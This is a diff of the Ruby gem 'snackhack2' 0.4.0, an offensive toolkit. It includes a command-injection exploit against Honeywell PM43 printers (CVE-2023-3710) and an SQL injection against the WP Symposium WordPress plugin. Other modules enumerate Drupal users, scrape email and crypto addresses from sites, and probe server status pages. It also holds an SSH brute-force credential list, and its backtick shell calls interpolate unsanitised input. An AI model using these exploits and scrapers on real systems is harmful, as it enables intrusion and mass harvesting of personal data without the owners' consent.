snackhack2 0.4.0

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: bbc624381b4958502decfc6b7ac465d6403f1188ce32dab550646e845ccddf12
+  data.tar.gz: 1cc81ff8c7b3de88dfcb61ac2c017399d278d507c5e961ef1de1e217a57210f2
+SHA512:
+  metadata.gz: 74be7753128578579313e14a33b5796262126c3286d6ab77bb345ffd61cf1fb6f0a586e8369ce36a73c0135db99a26b36b73209e67b2d5d2ad59ab758e6035b0
+  data.tar.gz: 490420d11d5a8d93c0d11a3644abfde7ef00ee34621f84074bb82e69e6bea3899646e3c31407b2886d61bfe30b0bbfa12b2f0ade9d88007b18bd703288ed21d9

data/lib/snackhack2/Honeywell_PM43.rb

@@ -0,0 +1,27 @@
+require 'httparty'
+module Snackhack2
+  class HoneywellPM43
+    # CVE-2023-3710
+    # Source: https://www.exploit-db.com/exploits/51885
+    attr_reader :command
+
+    def initialize(site, command: "ls", save_file: true)
+      @site = site
+      @command = command
+    end
+
+    def command=(c)
+      @command = c
+    end
+
+    def run
+      pp = HTTParty.post(File.join(@site, "loadfile.lp?pageid=Configure"),
+                         body: "username=x%0a#{@command}%0a&userpassword=1")
+      if pp.code == 200
+        puts pp
+      else
+        puts "[+] Status Code: #{pp.code}"
+      end
+    end
+  end
+end

data/lib/snackhack2/WP_Symposium.rb

@@ -0,0 +1,22 @@
+# frozen_string_literal: true
+
+module Snackhack2
+  class WPSymposium
+    # SOURCE: https://github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2015-6522
+    # https://www.exploit-db.com/exploits/37824
+    # Reveal the MySQL version
+    def initialize(site)
+      @site = site
+    end
+
+    def run
+      wp = Snackhack2::get(File.join(@site,
+                                     '/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--'))
+      if wp.code == 200
+        puts wp.body
+      else
+        puts "[+] HTTP Code: #{wp.code}"
+      end
+    end
+  end
+end

data/lib/snackhack2/bannergrabber.rb

@@ -0,0 +1,82 @@
+# frozen_string_literal: true
+
+require 'socket'
+module Snackhack2
+  class BannerGrabber
+    attr_accessor :site, :save_file
+
+    def initialize(site, port: 443, save_file: true)
+      @site    = site
+      @port    = port
+      @headers = Snackhack2::get(@site).headers
+      @save_file = save_file
+    end
+
+    def site
+      @site.gsub('https://', '')
+    end
+
+    def run
+      nginx
+      apache2
+      wordpress
+      headers
+    end
+
+    def nginx
+      if @headers['server'].match(/nginx/)
+        puts "[+] Server is running NGINX... Now checking if #{File.join(@site, "nginx_status")} is valid..."
+        nginx = Snackhack2::get(File.join(@site, "nginx_status"))
+        if nginx.code == 200
+          puts "Check #{@site}/nginx_status"
+        else
+          puts "Response code: #{nginx.code}"
+        end
+      end
+    end
+
+    def curl
+      servers = ''
+      cmd = `curl -s -I #{@site.gsub('https://', '')}`
+      version = cmd.split('Server: ')[1].split("\n")[0].strip
+      if @save_file
+        servers += version.to_s
+      else
+        puts "Banner: #{cmd.split('Server: ')[1].split("\n")[0]}"
+      end
+      Snackhack2::file_save(@site, "serverversion", servers) if @save_file
+    end
+
+    def apache2
+      if @headers['server'].match(/Apache/)
+        puts "[+] Server is running APACHE2... Now checking #{File.join(@site, "server-status")}..."
+        apache = Snackhack2::get(File.join(@site, "server-status"))
+        if apache.code == 200
+          puts "Check #{@site}/server-status"
+        else
+          puts "[+] Response Code: #{apache.code}...\n\n"
+        end
+      else
+        puts "Apache2 is not found...\n\n"
+      end
+    end
+
+    def wordpress
+      wp = Snackhack2::get(@site).body
+      return unless wp.match(/wp-content/)
+
+      puts "[+] Wordpress found [+]\n\n\n"
+    end
+
+    def headers
+      h = Snackhack2::get(@site).headers
+      puts "[+] Server Version: #{h['server']}..."
+    end
+
+    def server
+      @headers['server']
+    end
+
+    attr_reader :site
+  end
+end

data/lib/snackhack2/cryptoextractor.rb

@@ -0,0 +1,64 @@
+# frozen_string_literal: true
+
+require 'httparty'
+require 'uri'
+module Snackhack2
+  class CryptoExtractWebsite
+    attr_accessor :save_file
+
+    def initialize(site, save_file: true)
+      @http = Snackhack2::get(site).body
+      @site = site
+      @save_file = save_file
+    end
+
+    def run
+      addresses = []
+      addresses << monero unless monero.nil?
+      addresses << bitcoin unless bitcoin.nil?
+      addresses << dash unless dash.nil?
+      addresses << ethereum unless ethereum.nil?
+      addresses << bitcoincash unless bitcoincash.nil?
+      addresses << litecoin unless litecoin.nil?
+      addresses << dogecoin unless dogecoin.nil?
+      addresses << stellar unless stellar.nil?
+      if @save_file
+        Snackhack2::file_save(@site, "cryptoaddresses", addresses.uniq.join("\n"))
+      else
+        puts addresses.join("\n")
+      end
+    end
+
+    def monero
+      @http.scan(/[48][0-9AB][1-9A-HJ-NP-Za-km-z]{93}/)
+    end
+
+    def bitcoin
+      @http.scan(/(bc(0([ac-hj-np-z02-9]{39}|[ac-hj-np-z02-9]{59})|1[ac-hj-np-z02-9]{8,87})|[13][a-km-zA-HJ-NP-Z1-9]{25,35})/)
+    end
+
+    def dash
+      @http.scan(/X[1-9A-HJ-NP-Za-km-z]{33}/)
+    end
+
+    def stellar
+      @http.scan(/G[A-Z0-9]{55}$/)
+    end
+
+    def litecoin
+      @http.scan(/[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}/)
+    end
+
+    def dogecoin
+      @http.scan(/D{1}[56789ABCDEFGHJKLMNPQRSTU]{1}[123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{32}$/)
+    end
+
+    def ethereum
+      @http.scan(/0x[a-fA-F0-9]{40}/)
+    end
+
+    def bitcoincash
+      @http.scan(/[13][a-km-zA-HJ-NP-Z1-9]{33}/)
+    end
+  end
+end

data/lib/snackhack2/drupal.rb

@@ -0,0 +1,49 @@
+require 'nokogiri'
+require 'open-uri'
+module Snackhack2
+  class Drupal
+    def initialize(site)
+      @site = site
+    end
+
+    def all
+      drupal_score
+      user_brute
+    end
+
+    def drupal_score
+      drupal_score = 0
+      d = Snackhack2::get(@site)
+      if d.code == 200
+        d.headers.each do |k|
+          if k.include?("drupal")
+            drupal_score += 10
+          end
+        end
+      end
+      d.headers.each do |v|
+        if v.include?("drupal")
+          drupal_score += 10
+        end
+      end
+      doc = Nokogiri::HTML(URI.open(@site))
+      posts = doc.xpath('//meta')
+      posts.each do |l|
+        if l.attributes['content'].to_s.include?("Drupal")
+          puts "[+] Drupal Version: #{l.attributes['content']}\n"
+        end
+      end
+      puts "Drupal Score: #{drupal_score}"
+    end
+
+    def user_brute
+      for user in 1..1000 do
+        u = Snackhack2::get(File.join(@site, "user", user.to_s)).body
+        if u.include?("Page not found")
+          puts "User count: #{user - 1}"
+          break
+        end
+      end
+    end
+  end
+end

data/lib/snackhack2/emails.rb

@@ -0,0 +1,35 @@
+require 'httparty'
+require 'spidr'
+module Snackhack2
+  class Email
+    attr_accessor :max_depth
+
+    def initialize(site, save_file: true, max_depth: 4)
+      @site = site
+      @save_file = save_file
+      @max_depth = max_depth
+    end
+
+    def max_depth
+      @max_depth
+    end
+
+    def run
+      found_emails = []
+      Spidr.start_at(@site, max_depth: @max_depth) do |agent|
+        agent.every_page do |page|
+          body = page.to_s
+          if body.scan(/[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}/)
+            email = body.scan(/[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}/).uniq
+            if !email.include?(found_emails)
+              if !email.empty?
+                found_emails << email
+              end
+            end
+          end
+        end
+      end
+      Snackhack2::file_save(@site, "emails", found_emails.uniq.join("\n")) if @save_file
+    end
+  end
+end

data/lib/snackhack2/google_analytics.rb

@@ -0,0 +1,28 @@
+# frozen_string_literal: true
+
+require 'httparty'
+module Snackhack2
+  class GoogleAnalytics
+    attr_reader :site
+
+    def initialize(site)
+      @site = site
+    end
+
+    def run
+      a = Snackhack2::get(@site).body
+      case a
+      when /UA-\d{8}-\d/
+        puts a.match(/UA-\d{8}-\d/)
+      when /GTM-[A-Z0-9]{7}/
+        puts a.match(/GTM-[A-Z0-9]{7}/)
+      when /G-([0-9]+([A-Za-z]+[0-9]+)+)/
+        puts a.match(/G-([0-9]+([A-Za-z]+[0-9]+)+)/)
+      when /G-[A-Za-z0-9]+/
+        puts a.match(/G-[A-Za-z0-9]+/)
+      else
+        puts '[+] No Google Analytics found :('
+      end
+    end
+  end
+end

data/lib/snackhack2/iplookup.rb

@@ -0,0 +1,31 @@
+# frozen_string_literal: true
+
+module Snackhack2
+  class IpLookup
+    def initialize(site)
+      @site = site
+    end
+
+    def run
+      get_ip
+      nslookup
+    end
+
+    def get_ip
+      ips = []
+      ip = `ping -c 2 #{@site.gsub('https://', '')}`.lines
+      ip.each do |l|
+        new_ip = l.match(/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/)
+        ips << new_ip.to_s unless ips.include?(new_ip)
+      end
+      puts "IP via ping: #{ips.shift}\n\n\n\n"
+    end
+
+    def nslookup
+      ns = `nslookup #{@site.gsub('https://', '')}`.lines
+      ns.each do |ip|
+        puts ip if ip.include?('Address')
+      end
+    end
+  end
+end

data/lib/snackhack2/lists/sshbrute.txt

@@ -0,0 +1,4 @@
+admin:password
+tom:password
+user:admin
+admin:admin